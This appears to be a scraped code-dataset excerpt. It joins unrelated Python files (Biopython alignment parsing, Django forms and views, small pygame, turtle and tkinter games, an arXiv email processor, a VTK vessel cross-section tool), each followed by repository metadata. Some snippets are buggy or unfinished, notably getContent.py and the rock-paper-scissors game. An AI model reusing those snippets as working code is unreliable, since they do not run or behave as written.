if strand == "-":
hard_clip_left, hard_clip_right = hard_clip_right, hard_clip_left
if hard_clip_left is not None:
query.annotations["hard_clip_left"] = hard_clip_left
if hard_clip_right is not None:
query.annotations["hard_clip_right"] = hard_clip_right
if qual != "*":
query.letter_annotations["phred_quality"] = qual
records = [target, query]
alignment = Alignment(records, coordinates)
alignment.flag = flag
if mapq != 255:
alignment.mapq = mapq
if rnext == "=":
alignment.rnext = rname
elif rnext != "*":
alignment.rnext = rnext
if pnext >= 0:
alignment.pnext = pnext
if tlen != 0:
alignment.tlen = tlen
if score is not None:
alignment.score = score
if annotations:
alignment.annotations = annotations
if hard_clip_left is not None:
alignment.hard_clip_left = hard_clip_left
if hard_clip_right is not None:
alignment.hard_clip_right = hard_clip_right
if store_operations:
alignment.operations = operations
return alignment
|
[
"noreply@github.com"
] |
fabianegli.noreply@github.com
|
848f6eb93120d4e255b540a17c2a3762b9c4cd03
|
127525c61d9f4b4f6a69998a07d058e2e53505e2
|
/index/forms.py
|
bb09938d4585eaf5d593292b2ad3e9a8aebaf2f4
|
[] |
no_license
|
Oluwatobi17/spud
|
c742b772282188866b4d158fe950ba2389f22443
|
7d4dd81f32c1352dc6b41a9f4c88cc881a888878
|
refs/heads/master
| 2022-12-14T19:24:23.765046
| 2020-07-26T22:21:21
| 2020-07-26T22:21:21
| 293,567,613
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 529
|
py
|
from django import forms
from .models import User, Commodity, Cart
class UserForm(forms.ModelForm):
password = forms.CharField(widget=forms.PasswordInput)
class Meta:
model = User
fields = ['username', 'first_name', 'last_name','email', 'password']
class CheckoutForm(forms.ModelForm):
class Meta:
model = Cart
fields = ['user','name', 'address','town', 'phoneno', 'email']
class UserUpdateForm(forms.ModelForm):
class Meta:
model = User
fields = ['first_name','last_name', 'address', 'phoneno', 'email']
|
[
"ganiuolalekan2000@yahoo.com"
] |
ganiuolalekan2000@yahoo.com
|
ba7cf89efb3b3e047499591256a9cb869bc442da
|
351f709d96fc08b2f42f2dd42efe02bff76f41a3
|
/turtleDraw.py
|
43a47232ccafb0270905bcad25214f5e0d2dae93
|
[] |
no_license
|
ChristopherGawdzikD/Turtles
|
69f9a36627eeea5e7f1d38bbce6126fbe09c91d9
|
8eeb33f2706c15ba6e4bbb869cada5bebf941616
|
refs/heads/master
| 2022-12-04T00:02:12.125401
| 2020-08-16T18:54:40
| 2020-08-16T18:54:40
| 288,003,895
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 270
|
py
|
from turtle import*
def getAudiLogo():
# Will make audi logo
#Uses two for loops with one nested
for i in range(4):
for x in ["grey"]:
color(x)
pensize(5)
circle(50)
forward(60)
print(getAudiLogo())
|
[
"noreply@github.com"
] |
ChristopherGawdzikD.noreply@github.com
|
f18eaaed0fbf1f40f0d8fed1c9e176c104f334bf
|
4454ed622d051f602373d7946a3936ff33cc8e97
|
/alien/enemy.py
|
1536b22abde5d8b5dd744b37d3c66d5005970225
|
[] |
no_license
|
showlocked/plane_game
|
23c056c7b85c00184c357001db21300d5eb1680e
|
b25cd1fdbce2735c903bbedb02fd85a457bcdc8f
|
refs/heads/master
| 2021-09-26T22:00:14.874451
| 2017-12-24T18:21:19
| 2017-12-24T18:21:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,560
|
py
|
from random import random
import pygame
from pygame.sprite import Sprite
__author__ = 'heshipeng'
class Enemy(Sprite):
""" 敌方飞机类 """
def __init__(self, ali_settings, screen):
""" 初始化外星人并设置其初始位置 """
super(Enemy, self).__init__()
self.screen = screen
self.ali_settings = ali_settings
# 加载外星人图像,并设置其rect属性
self.image = pygame.image.load('images/enemy_plane.png')
self.rect = self.image.get_rect()
# 根据敌方飞机出现位置判断移动方向
self.move_right = True
# 每个外星人初始都在屏幕左上角附近
self.rect.x = self.get_width()
self.rect.y = self.rect.height
# 存储敌方飞机的准确位置
self.x = float(self.rect.x)
self.y = float(self.rect.y)
def blitme(self):
""" 在指定位置画敌方飞机 """
self.screen.blit(self.image, self.rect)
def update(self, *args):
if self.move_right:
self.x += self.ali_settings.enemy_speed_factor
else:
self.x -= self.ali_settings.enemy_speed_factor
self.y += self.ali_settings.enemy_speed_factor
self.rect.x = self.x
self.rect.y = self.y
def get_width(self):
width_range = [0, self.screen.get_rect().right]
if random() > 0.5:
self.move_right = True
return width_range[0]
else:
self.move_right = False
return width_range[1]
|
[
"727138269@qq.com"
] |
727138269@qq.com
|
97b1215057e7a75ddc92b8f5f933bb8ee03b0733
|
23adf40a6ec7e99634053c6eb24c59fd3be4cacd
|
/Project_3.py
|
fc3c4d80837f59b8ad07c7b5648dd22578a1df1d
|
[] |
no_license
|
fyiidk/ITT109-GROUP_ASSIGNMENT
|
07164611168347d4b1029eed33aa447c7a190afb
|
286fd86532dcbaa42ee40f73ccb6a030fbfad468
|
refs/heads/master
| 2020-05-06T15:35:59.914433
| 2019-04-08T16:38:26
| 2019-04-08T16:38:26
| 180,198,546
| 0
| 0
| null | 2019-04-08T17:23:02
| 2019-04-08T17:23:02
| null |
UTF-8
|
Python
| false
| false
| 2,477
|
py
|
#! /usr/bin/python
from tkinter import *
from random import randint
#main function for determaining wins, loses and draws.
def play(event):
#Images for Choices
scissor_image = PhotoImage(file="scissor.png")
rock_image = PhotoImage(file="rock.png")
paper_image = PhotoImage(file="paper.png")
output = Label(sideframe, pady=10)
output.grid(column=1, row=1)
human_choice = player_choice.get()
actions = ["Scissors","Rock","Paper"]
computer_choice = actions[randint(0,2)]
print(f"Computer: {computer_choice}")
print(f"Player: {human_choice}")
if player_choice == computer_choice:
return "Draw"
output.config(text="Draw")
if player_choice == "Rock" and computer_choice == "Paper":
return "Computer Wins"
output.config(text="Computer wins")
if player_choice == "Paper" and computer_choice == "Scissors":
return "Computer Wins"
output.config(text="Computer Wins")
if player_choice == "Scissors" and computer_choice == "Rock":
return "Computer Wins"
output.config(text="Computer Wins")
else:
return "Player Wins"
output.config(text="Player Wins")
#Makes a window to place things inside of :3
window = Tk()
window.title("Rock, Paper, Scissors")
window.geometry("300x300")
#creates the frame in which the player will interact with.
mainframe = Frame(window, padx=20, pady=12)
mainframe.grid(column=0, row = 0, sticky=(N,W,E,S))
mainframe.columnconfigure(0, weight=1)
mainframe.rowconfigure(0,weight=1)
#creates frame where output will be placed. (not finished)
sideframe = Frame(window, padx=20, pady=12)
sideframe.grid(column=1, row = 0, sticky=(N,W,E,S))
sideframe.columnconfigure(0, weight=1)
sideframe.rowconfigure(0,weight=1)
#player variable.
player_choice = StringVar()
#creates buttons that player will interact with.
rock_radiobutton = Radiobutton(mainframe, pady=10, text ='Rock', variable = player_choice, value = "Rock")
rock_radiobutton.grid(column=1, row=2, sticky=W)
paper_radiobutton = Radiobutton(mainframe, pady=10 ,text ='Paper', variable = player_choice, value = "Paper")
paper_radiobutton.grid(column=1, row=3, sticky=W)
scissors_radiobutton = Radiobutton(mainframe, pady= 10,text ='Scissors', variable = player_choice, value = "Scissors")
scissors_radiobutton.grid(column=1, row=4, sticky=W)
submit_button = Button(mainframe, pady=10, text="Submit", width=3, height=1)
submit_button.bind("<Button-1>", play)
submit_button.grid(column=1, row=6, sticky=W)
#Keeps window from closing, DO NOT REMOVE.
window.mainloop()
|
[
"noreply@github.com"
] |
fyiidk.noreply@github.com
|
593300d8d86a3b96ee66b4f708950e7b2bf3ea0e
|
7e8752279e9b3c81ead83e6d5c5b57b65372db19
|
/getContent.py
|
cc9e336cd50683b8c8db0bde7ecef74bcd0744ae
|
[] |
no_license
|
kavenshi/spiders
|
4ef8a7d28775de213e9fe6f7be2d75e3a1b2aa00
|
a136a28018782661dda7ae0eed963a54a2e0cf7b
|
refs/heads/master
| 2021-09-06T10:03:49.414997
| 2018-02-04T11:34:41
| 2018-02-04T11:34:41
| 91,144,755
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 505
|
py
|
import re
def getcontent(listurl):
i=0
for i in range(0,len(listurl)):
for j in range(0,len(listurl[i])):
try:
url=listurl[i][j]
url=url.replace("amp;""")
#open the url
data =
titlepat = "<title>(.*?)</title>"
contentpat='id="js_content">(.*?)id="js_sg_bar"'
title = re.compile(titlepat).findall(data)
content=re.compile(contentpat).findall(data)
|
[
"shilinpeng1990@aliyun.com"
] |
shilinpeng1990@aliyun.com
|
f0a267d44630536aca0d49d18c4e2b1a5ad6841f
|
2d9fd57b30cfdda54b1277729b8e50d82120197c
|
/PEPapp/PEPapp/view.py
|
fdf075d1ae834a8d568882fc59760f3b36eafc71
|
[] |
no_license
|
paulinsider/PEP
|
c7f07c8d7a058525ceec5110d4361d74fe810b1c
|
68f43a36aae05322dae7b9742429d51416e6f2af
|
refs/heads/master
| 2021-01-19T18:23:06.492274
| 2017-08-29T08:31:27
| 2017-08-29T08:31:27
| 101,129,826
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,706
|
py
|
from django.http import HttpResponse,JsonResponse
from ContainerModel.models import Container_list
from django.shortcuts import render
import os
def index(request):
return render(request, 'common/index.html')
def list(request):
response = []
list = Container_list.objects.all()
for var in list:
if var.show_type != 1:
response.append(var)
return render(request, 'common/list.html', {'data':response})
'''
def startapp(request):
id = request.GET['id']
whereparam = {'id':id}
object = Container_list.objects.get(**whereparam)
if object.status == 0:
path = "sh /home/PEP.sh " + object.path + " start"
os.system(path)
object.status = 1
object.save()
response = []
list = Container_list.objects.all()
for var in list:
response.append(var)
return render(request, 'common/list.html', {'data': response})
def stopapp(request):
id = request.GET['id']
whereparam = {'id': id}
object = Container_list.objects.get(**whereparam)
if object.status == 1:
path = "sh /home/PEP.sh " + object.path + " stop"
os.system(path)
object.status = 0
object.save()
response = []
list = Container_list.objects.all()
for var in list:
response.append(var)
return render(request, 'common/list.html', {'data': response})
'''
def manageApp(request):
action = request.POST['action']
id = int(request.POST['id'])
list = Container_list.objects.all()
response = dict()
for var in list:
if var.show_type == 1 and var.id == id:
return HttpResponse(
JsonResponse({"status": "failed", "comment": "该镜像已经被删除!"}, content_type="application/json"))
if var.show_type == 1 :
continue
if var.status == 1 and action == 'start' and var.id != id:
return HttpResponse(JsonResponse({"status":"failed","comment":"用户一次只能申请一个练习环境。"}, content_type="application/json"))
if var.id == id:
if action == 'start' and var.status == 0:
path = "sh /home/PEP.sh " + var.path + " start"
os.system(path)
var.status = 1
var.save()
elif action == 'stop' and var.status == 1:
path = "sh /home/PEP.sh " + var.path + " stop"
os.system(path)
var.status=0
var.save()
return HttpResponse(JsonResponse({"status":"success"}, content_type="application/json"))
return HttpResponse(JsonResponse({"status":"failed","comment":"失败请重试!"}, content_type="application/json"))
|
[
"pav1,paulinsider@gmail.com"
] |
pav1,paulinsider@gmail.com
|
e1c702b160ba4a1de40e09ddb343fe3c2f08c3f7
|
8b19b224b9a26ebf586e295c61954ffb927f6e04
|
/MUPHY/MAGIC/BACKEND/SCRIPTS/TOOLS/get_xsect2.py
|
aad7b98542b39a06acd098f22067445908a72055
|
[] |
no_license
|
iacs-ac290r-2019/homework
|
5ca12a3e7fa0721e6785ca5a9069037673c3c591
|
7e052a85f97d0496c44b7aea1e5671c982cb064a
|
refs/heads/master
| 2020-04-22T22:27:57.534981
| 2019-05-08T03:52:20
| 2019-05-08T03:52:20
| 170,709,287
| 0
| 0
| null | 2019-04-09T15:37:53
| 2019-02-14T15:01:52
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 14,105
|
py
|
#!/usr/bin/env python
import os
import re
import sys
import time
import math
import getopt
def usage():
print >> sys.stderr, "Usage:",sys.argv[0],"-g stl_file -c vtk_file -s px,py,pz -e px,py,pz -n numcuts [-m]"
print >> sys.stderr, "Options:"
print >> sys.stderr, "\t-g stl_file"
print >> sys.stderr, "\t--geometry stl_file"
print >> sys.stderr, "\t\tSpecifies the STL file."
print >> sys.stderr, ""
print >> sys.stderr, "\t-c vtk_file"
print >> sys.stderr, "\t--cline vtk_file"
print >> sys.stderr, "\t\tSpecifies the VTK file containing a centerline for stl_file"
print >> sys.stderr, "\t\tspecifed with option -g."
print >> sys.stderr, ""
print >> sys.stderr, "\t-s px,py,pz"
print >> sys.stderr, "\t--startp px,py,pz"
print >> sys.stderr, "\t\tSpecifies the centerline point from which cross sections are cut"
print >> sys.stderr, ""
print >> sys.stderr, "\t-e px,py,pz"
print >> sys.stderr, "\t--endp px,py,pz"
print >> sys.stderr, "\t\tSpecifies the centerline point to which cross sections are cut"
print >> sys.stderr, ""
print >> sys.stderr, "\t-n numcuts"
print >> sys.stderr, "\t--number px,py,pz"
print >> sys.stderr, "\t\tSpecifies the number of cross sections cut between the start and"
print >> sys.stderr, "\t\tend point"
print >> sys.stderr, ""
print >> sys.stderr, "\t-m"
print >> sys.stderr, "\t--smooth"
print >> sys.stderr, "\t\tSpecifies whether the centerline in vtk_file must be smoothed"
print >> sys.stderr, "\t\tbefore cuttin the cross sections."
def dist2(n, m):
return (n[0]-m[0])**2 + (n[1]-m[1])**2 + (n[2]-m[2])**2
def get_normal(n, m):
l = math.sqrt(dist2(n,m))
if math.fabs(l-0.0) < 1.0E-10: return None
return tuple([(m[0]-n[0])/l,
(m[1]-n[1])/l,
(m[2]-n[2])/l])
def vec_prod(a,b):
return (a[1]*b[2]-a[2]*b[1], a[2]*b[0]-a[0]*b[2], a[0]*b[1]-a[1]*b[0])
def len_vect(a):
return math.sqrt(sum(n*n for n in a))
def dSur(v1, v2, v3):
v12 = (v2[0] - v1[0], v2[1] - v1[1], v2[2] - v1[2])
v13 = (v3[0] - v1[0], v3[1] - v1[1], v3[2] - v1[2])
vprod = vec_prod(v12, v13)
return len_vect(vprod)/2.0
def polygon_metrics(points, n):
center = [0.0, 0.0, 0.0]
for i in range(n):
center = map(lambda x,y:x+y, center, points.GetPoint(i))
center = map(lambda x: x/n, center)
peri = 0.0
area = 0.0
for i in range(1, n):
peri += math.sqrt(math.fabs(dist2(points.GetPoint(i-1), points.GetPoint(i))))
area += dSur(points.GetPoint(i-1), points.GetPoint(i), center)
peri += math.fabs(dist2(points.GetPoint(n-1), points.GetPoint(0)))
area += dSur(points.GetPoint(n-1), points.GetPoint(0), center)
return peri, area
def vect_mean(vlist):
if not vlist: return None
l = len(vlist)
tmp = (0.0, 0.0, 0.0)
for i in range(l):
tmp = map(sum, zip(tmp, vlist[i]))
return map(lambda x: x/l, tmp)
if __name__ == '__main__':
STLFNAME = ''
CLINEFNAME = ''
STAPOINT = None
ENDPOINT = None
CUTNUM = 1
SMOOTH = False
SMOOTH_WIDTH = 5
opts, args = getopt.getopt(sys.argv[1:], "g:c:s:e:n:m", ["geometry=","cline=","startp=","endp=","number=","smooth"])
if not opts:
usage()
sys.exit(1)
for o, a in opts:
if o in ("-g", "--geometry"):
STLFNAME = a
elif o in ("-c", "--cline"):
CLINEFNAME = a
elif o in ("-s", "--startp", "-e", "--endp"):
point = re.split('[ ]*,[ ]*', a.strip())
point = filter(lambda x:x, point)
try:
point = tuple(float(coo) for coo in point)
except ValueError:
print >> sys.stderr, 'Bad point specification:', a, '\n'
usage()
sys.exit(1)
if len(point) != 3:
print >> sys.stderr, 'Bad number of coordinates for point:', a, '\n'
usage()
sys.exit(1)
if o in ("-s", "--startp"):
if STAPOINT:
usage()
sys.exit(1)
STAPOINT = point
else:
if ENDPOINT:
usage()
sys.exit(1)
ENDPOINT = point
elif o in ("-n", "--number"):
CUTNUM = int(a)
elif o in ("-m", "--smooth"):
SMOOTH = True
else:
usage()
sys.exit(1)
if not STLFNAME or not CLINEFNAME:
print >> sys.stderr, 'Both geometry and centerline file must be specified.'
usage()
sys.exit(1)
if STLFNAME:
if not os.path.isfile(STLFNAME):
print >> sys.stderr, 'Cannot find file', STLFNAME
sys.exit(1)
if CLINEFNAME:
if not os.path.isfile(CLINEFNAME):
print >> sys.stderr, 'Cannot find file', CLINEFNAME
sys.exit(1)
if CUTNUM < 1:
print 'Number of cuts must be > 0!'
usage()
sys.exit(1)
# moved here to pay import latency after parameters checking
from myvtk import *
reader = vtk.vtkPolyDataReader()
reader.SetFileName(CLINEFNAME)
reader.Update()
clinePolyData = reader.GetOutput()
# we only consider the first VTK_POLY_LINE cell in the file
line = clinePolyData.GetCell(0)
if line.GetCellType() != vtk.VTK_POLY_LINE:
print 'VTK_POLY_LINE expected in file', CLINEFNAME
sys.exit(1)
points = line.GetPoints()
nump = line.GetNumberOfPoints()
if nump < 2:
print 'Too few points for center line!'
sys.exit(1)
# perform laplacian smooth, if requested
if SMOOTH:
for l in range(1,SMOOTH_WIDTH):
pbuf = []
nbuf = [points.GetPoint(i) for i in range(min(nump, l+1))]
for pid in range(nump):
tmp = vect_mean(pbuf + nbuf)
if len(pbuf) >= l: pbuf.pop(0)
pbuf += [points.GetPoint(pid)]
nbuf.pop(0)
if pid+l+1 < nump: nbuf += [points.GetPoint(pid+l+1)]
points.SetPoint(pid, tmp)
# find the points on the CLine that are the nearest to the specified start and end
startId = 0
endId = nump-1
if STAPOINT or ENDPOINT:
sDist = sys.maxint
eDist = sys.maxint
for pid in range(nump):
p = points.GetPoint(pid)
if STAPOINT:
d2 = dist2(p, STAPOINT)
if d2 < sDist:
startId = pid
sDist = d2
if ENDPOINT:
d2 = dist2(p, ENDPOINT)
if d2 < eDist:
endId = pid
eDist = d2
# the point range in the CLine is [startId,...,endId]
print 'IDs of starting and ending points:', startId, endId
incr = 1 if startId < endId else -1
pIdList = range(startId, endId+incr, incr)
length = 0.0
#for pid in pIdList[1:]:
for i in range(1, len(pIdList)):
length += math.sqrt(dist2(points.GetPoint(pIdList[i-1]),
points.GetPoint(pIdList[i ])))
print 'Length of center line section: {0: >8.3f}'.format(length)
if CUTNUM > 1:
stepLen = length / (CUTNUM-1)
else:
stepLen = 0
print 'Cuts distance: {0: >8.3f}'.format(stepLen)
# find cut planes positions
cutPlanes = []
currIdx = 0
currp = points.GetPoint(pIdList[currIdx])
nextIdx = 1
while True: # it happens that clines have first point duplicated...
n = get_normal(currp, points.GetPoint(pIdList[nextIdx]))
if n: break
nextIdx += 1
cutPlanes.append([currp, n])
for i in range(CUTNUM-1): # we always start from 0 even if there are initial duplicate points
clen = 0.0
while True:
nextIdx = currIdx+1
nextp = points.GetPoint(pIdList[nextIdx])
d = math.sqrt(dist2(currp, nextp))
if (clen + d) > stepLen: break
if nextIdx == len(pIdList)-1: break
clen += d
currIdx = nextIdx
currp = nextp
dl = stepLen-clen
ratio = dl/d
#print '\tCurrent polyline length:', clen+dl
#print '\tCurrent polyline segment:', pIdList[currIdx], pIdList[nextIdx]
p = tuple([currp[0] + ratio*(nextp[0]-currp[0]),
currp[1] + ratio*(nextp[1]-currp[1]),
currp[2] + ratio*(nextp[2]-currp[2])])
cutPlanes.append([p, get_normal(currp, nextp)])
currp = p
stl = vtk.vtkSTLReader()
stl.SetFileName(STLFNAME)
pdw = vtk.vtkPolyDataWriter()
fsection = open('sections.dat','w')
for i in range(len(cutPlanes)):
p, n = cutPlanes[i]
#print 'Cross section {0}: position {1: >8.3f} {2: >8.3f} {3: >8.3f}'.format(i, p[0], p[1], p[2])
#print 'Cross section {0}: normal {1: >8.3f} {2: >8.3f} {3: >8.3f}'.format(i, n[0], n[1], n[2])
plane = vtk.vtkPlane()
plane.SetOrigin(p)
plane.SetNormal(n)
cutEdges = vtk.vtkCutter()
cutEdges.SetInputConnection(stl.GetOutputPort())
cutEdges.SetCutFunction(plane)
#cutEdges.GenerateCutScalarsOn()
#cutEdges.SetValue(0, 0.0)
cutStrips = vtk.vtkStripper()
cutStrips.SetInputConnection(cutEdges.GetOutputPort())
cutStrips.Update()
#cutPoly = vtk.vtkPolyData()
#cutPoly.SetPoints(cutStrips.GetOutput().GetPoints())
#cutPoly.SetLines(cutStrips.GetOutput().GetLines())
cutPoly = vtk.vtkPolyData()
cutPoly.SetPoints(cutStrips.GetOutput().GetPoints())
cutPoly.SetLines(cutStrips.GetOutput().GetLines())
conn = vtk.vtkPolyDataConnectivityFilter()
if vtk.VTK_MAJOR_VERSION <= 5:
conn.SetInput(cutPoly)
else:
conn.SetInputData(cutPoly)
conn.SetExtractionModeToClosestPointRegion() # extract region nearest to point
conn.SetClosestPoint(p)
conn.Update()
section = conn.GetOutput()
# compute polygons metrics
peri, area = polygon_metrics(section.GetCell(0).GetPoints(),
section.GetCell(0).GetNumberOfPoints()-1) # last is the repetition of the first!
# print 'Cross section {0}: perimeter {1: >8.3f} - area {2: >8.3f} - m.diam {3: >8.3f}'.format(i,
# peri,
# area,
# math.sqrt(area/(math.pi))*2.0)
print >> fsection, '{0} {1: >8.3f} {2: >8.3f}'.format(i, area, math.sqrt(area/(math.pi))*2.0)
# write data with only azimutal lines
# pdw.SetInput(section)
# pdw.SetFileName('crossSect'+str(i)+'.vtk')
# pdw.Write()
# create cells with triangular cells
merge = vtk.vtkAppendPolyData()
center = vtk.vtkPolyData()
cc = vtk.vtkPoints()
cc.InsertNextPoint(p) # insert center
center.SetPoints(cc)
if vtk.VTK_MAJOR_VERSION <= 5:
merge.AddInput(center)
merge.AddInput(section)
else:
merge.AddInputData(center)
merge.AddInputData(section)
merge.Update()
merge.GetOutput().DeleteCells()
segmCells = vtk.vtkCellArray()
line = vtk.vtkLine()
nump = section.GetNumberOfPoints()
SHOWTRIANGLES=False
for k in range(1,nump+1):
if SHOWTRIANGLES:
t = vtk.vtkTriangle()
t.GetPointIds().SetId(0,0)
t.GetPointIds().SetId(1,k)
t.GetPointIds().SetId(2,k%nump+1)
segmCells.InsertNextCell(t)
else:
line.GetPointIds().SetId(0,k)
line.GetPointIds().SetId(1,k%nump+1)
segmCells.InsertNextCell(line)
merge.GetOutput().SetLines(segmCells)
# print '# of Cells:',merge.GetOutput().GetNumberOfCells()
field = vtk.vtkFieldData()
field.SetNumberOfTuples(3)
val = vtk.vtkFloatArray()
val.SetName("area")
val.InsertNextValue(area)
field.AddArray(val)
val = vtk.vtkFloatArray()
val.SetName("mean_diameter")
val.InsertNextValue( 2.0 * math.sqrt(area/math.pi) )
field.AddArray(val)
val = vtk.vtkFloatArray()
val.SetName("perimeter")
val.InsertNextValue(peri)
field.AddArray(val)
merge.GetOutput().SetFieldData(field)
merge.Update()
if vtk.VTK_MAJOR_VERSION <= 5:
pdw.SetInput(merge.GetOutput())
else:
pdw.SetInputData(merge.GetOutput())
if i<10:
pad = '00'+str(i)
elif i<100:
pad = '0'+str(i)
elif i<1000:
pad = str(i)
else:
pad = 'XXX'+str(i)
pdw.SetFileName('crossSect'+pad+'.vtk')
pdw.Write()
## uncomment the block below to write cut normals in a vtk file
## for review
#wpoints = vtk.vtkPoints()
#for p in cutPlanes:
# wpoints.InsertNextPoint(p[0])
# # to visualize normals add a point along them
# q = [p[0][0]+p[1][0], p[0][1]+p[1][1], p[0][2]+p[1][2]]
# wpoints.InsertNextPoint(q)
#
#polydata = vtk.vtkPolyData()
#polydata.SetPoints(wpoints)
#
#segmCells = vtk.vtkCellArray()
#for i in range(len(cutPlanes)):
# line = vtk.vtkLine()
# line.GetPointIds().SetId(0,2*i)
# line.GetPointIds().SetId(1,2*i+1)
# segmCells.InsertNextCell(line)
#
#polydata.SetLines(segmCells)
#
#pdw.SetInput(polydata)
#pdw.SetFileName('cut_normals.vtk')
#pdw.Write()
|
[
"michael.s.emanuel@gmail.com"
] |
michael.s.emanuel@gmail.com
|
62aafbdb22650f40b609eb82abfdd148b18ba3a7
|
64654842414a5bbffa2456f706c14d1a5a1dbae2
|
/autoarxiv/warden/scripts/emailer.py
|
0091e500d47aefcb749603575cbd4c06a4c8253d
|
[
"MIT"
] |
permissive
|
Reslix/AutoArxiv
|
e25b1bdf94b9b01109bed7399c86da76a6df9f3a
|
96f57e687716c1b0d0786943fbc74bf2f4389da7
|
refs/heads/master
| 2021-01-20T11:41:36.617274
| 2018-01-23T00:54:34
| 2018-01-23T00:54:34
| 77,075,353
| 0
| 0
| null | 2017-02-03T05:48:27
| 2016-12-21T18:11:54
|
Python
|
UTF-8
|
Python
| false
| false
| 6,709
|
py
|
import re
import email
import imaplib
from django.core.mail import send_mail
from autoarxiv import settings
from warden.models import Author, AuthorRating, Article, ArticleRating, Member
from warden.scripts.data_connector import DataConnector
def send_listing(e_mail, listing):
"""
Formats the sorted listing into some readable plaintext form. Hasn't been tested, so this will prove to be interesting.
"""
message = "\n"
for i, msg in enumerate(listing):
message = message + msg + '\n\n'
message = message + """\n\n To update ratings for an article or author, send an email (not a reply!) to this sender address with
ARTICLE or AUTHOR in the subject line.
For articles, list line-by-line the article Arxiv ID as it came in the listing and an
integer rating between 1 and 5, separated by a comma. If the article is not currently
in the library it will be added.
For authors, do the same with the author's name and have the rating added
in the same way.
Please make sure to use of the full scale range in your ratings library to help the ML aspects.
If new users want to subscribe, they should email this address with SUBSCRIBE as the subject,
and have <email>, <name> in the first line of the body.
"""
# len(listing-3) because of the extra header stuff we put in
send_mail(str(len(listing) - 3) + ' New listings, ordered by relevance',
message,
settings.EMAIL_HOST_USER,
[e_mail])
print("Sent listing to " + e_mail)
def receive_emails():
try:
mail = imaplib.IMAP4_SSL('imap.gmail.com')
mail.login(settings.EMAIL_HOST_USER, settings.EMAIL_HOST_PASSWORD)
except:
print('Unable to connect to imap')
mail.select('inbox')
rawmessage = []
retcode, data = mail.search(None, '(UNSEEN)')
for num in data[0].split():
typ, data = mail.fetch(num, '(RFC822)')
msg = email.message_from_bytes(data[0][1])
#typ, data = mail.store(num, '+FLAGS', '\\Seen')
rawmessage.append(msg)
for message in rawmessage:
header = email.header.make_header(email.header.decode_header(message['Subject']))
subject = str(header)
sender = message['From'].split()[-1][1:-1]
payload = [m.get_payload() for m in message.get_payload()][0]
member = Member.objects.filter(email=sender)
print("Updating preferences for: " + message['From'])
if len(member) != 0:
member = member[0]
if subject == 'AUTHOR':
body = payload.split('\n')
for line in body:
print(line)
line = line.split(',')
if len(line) == 2:
if '@' in line[0]:
author = Author.objects.filter(email=line[0])
else:
author = Author.objects.filter(name=line[0])
arating = []
if len(author) != 0:
author = author[0]
arating = AuthorRating.objects.filter(member=member, author=author)
else:
author = Author(name=line[0])
author.save()
if len(arating) != 0:
arating = arating[0]
arating.rating = int(line[1])
else:
arating = AuthorRating(member=member, author=author, rating=int(line[1]))
arating.save()
elif subject == 'ARTICLE':
body = payload.split('\n')
for line in body:
print(line)
line = line.split(',')
if len(line) == 2:
article = Article.objects.filter(shortid=line[0])
if len(article) != 0:
arating = ArticleRating.objects.filter(member=member, article=article[0])
if len(arating) != 0:
arating = arating[0]
arating.rating = int(line[1])
else:
arating = ArticleRating(member=member, article=article[0], rating=int(line[1]))
else:
d = DataConnector()
d.fetch_links(query=line[0])
d.fetch_pdfs()
d.pdf_to_txt()
d.save(add_new=False)
article = d.articles[0]
arating = ArticleRating(member=member, article=article, rating=int(line[1]))
arating.save()
elif subject == 'SUBSCRIBE':
body = payload.split('\n')[0].split(',')
if len(Member.objects.all().filter(name=body[1], email=body[0])) == 0:
member = Member(name=body[1], email=body[0])
member.save()
send_mail('You have subscribed!', """ To update ratings for an article or author, send an email (not a reply!) to this sender address with
ARTICLE or AUTHOR in the subject line.
For articles, list line-by-line the article Arxiv ID as it came in the listing and an
integer rating between 1 and 5, separated by a comma. If the article is not currently
in the library it will be added.
For authors, do the same with the author's name and have the rating added
in the same way.
Please make sure to use of the full scale range in your ratings library to help the ML aspects.""",
settings.EMAIL_HOST_USER,
[sender])
mail.close()
|
[
"huashengz@gmail.com"
] |
huashengz@gmail.com
|
e87ab2c053552be6df6333daf37c54e1c4e56527
|
3adf9934a74077c328b9a0afff37f8ca355eead1
|
/comicresizer/forms.py
|
a2f083f2fd6d9a8ab0f950d16e2e7b6010e34b3e
|
[] |
no_license
|
jgasteiz/comic-resizer
|
36671623fe9909f23fba793b44cf4ac56380926a
|
12d2e12efdf2017746d67a4b6d9616613ee58bb9
|
refs/heads/master
| 2021-07-05T05:56:00.911958
| 2017-09-27T07:43:58
| 2017-09-27T07:45:25
| 104,987,910
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 105
|
py
|
from django import forms
class ComicUploadForm(forms.Form):
file = forms.FileField(required=False)
|
[
"javi.manzano.oller@gmail.com"
] |
javi.manzano.oller@gmail.com
|
9e5d44f522f009d23699c1591c4e0874b753a458
|
74b978b712a5fa1645e7b7dcc9488a9a47a7a1b5
|
/blueprint/models.py
|
d4fb16656bfd02c446dbc1c4704c4fcfc26c8fbc
|
[] |
no_license
|
ikalchenko/blueprint
|
6a9653365c08651e997e0ee230e945d405746cb7
|
ab5c039fe2a1fce75266f17e00c867e2abd05e78
|
refs/heads/master
| 2020-05-21T18:55:43.272085
| 2019-05-20T19:21:32
| 2019-05-20T19:21:32
| 186,143,153
| 0
| 0
| null | 2019-05-20T19:21:34
| 2019-05-11T14:30:33
|
Python
|
UTF-8
|
Python
| false
| false
| 299
|
py
|
from .extensions import db
class BaseModel(db.Model):
id = db.Column(db.Integer, primary_key=True)
# date_created = db.Column(db.DateTime, server_default=db.func.now())
# date_modified = db.Column(db.DateTime, server_default=db.func.now())
async def serialize(self):
pass
|
[
"ikalchenko99@gmail.com"
] |
ikalchenko99@gmail.com
|
e770a09f01a41928a6a78f803955c09a6b3e83a7
|
33638679295dbe6bf1c9708fba570708afdc081b
|
/api/stablemanager/datalayer.py
|
5229c165c0ee079a4229b0c9b6270f1044727fe5
|
[
"Apache-2.0"
] |
permissive
|
toddg3s/wtfmanager
|
3317c252138d390766d3214ae6ccc472f0413d87
|
04fb30fb7de1a60a74e17b1254b5c2d3a7450b73
|
refs/heads/master
| 2021-08-31T22:45:12.444566
| 2017-12-23T06:55:33
| 2017-12-23T06:55:33
| 115,176,380
| 0
| 0
